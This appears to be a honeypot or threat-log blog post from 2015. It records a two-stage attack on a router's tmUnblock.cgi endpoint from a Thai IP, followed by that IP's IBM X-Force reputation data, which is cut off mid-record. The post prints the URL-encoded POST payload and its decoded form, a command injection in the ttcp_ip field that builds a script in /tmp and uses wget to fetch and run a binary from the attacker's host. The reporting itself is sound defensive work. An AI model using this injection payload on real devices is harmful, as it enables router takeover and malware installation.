Sonntag, 26. Juli 2015

Two stage nttpd attack - 119.42.100.97

BEGIN OF HTTP DATA:
2015-07-27 00:58:11
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
GET /tmUnblock.cgi HTTP/1.1


 END OF DATA

BEGIN OF HTTP DATA:
2015-07-27 00:58:51
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 943

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%39%2e%34%32%2e%31%30%30%2e%39%37%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA

What translates to
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1
 As you can see, the first test "GET /tmUnblock.cgi" was successful, so the attacker tried to inject the code to get this nttpd on to the system.

I was still not able to get my hands on this code. If someone has it, please let me know.

IBM-Xforce shows
{
   "categoryDescriptions": {
      "Dynamic IPs": "This category contains IP addresses of dialup hosts and DSL lines.",
      "Spam": "This category lists IP addresses that were seen sending out spam."
   },
   "cats": {
      "Dynamic IPs": 86,
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "119.42.100.97",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2014-01-23T17:33:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },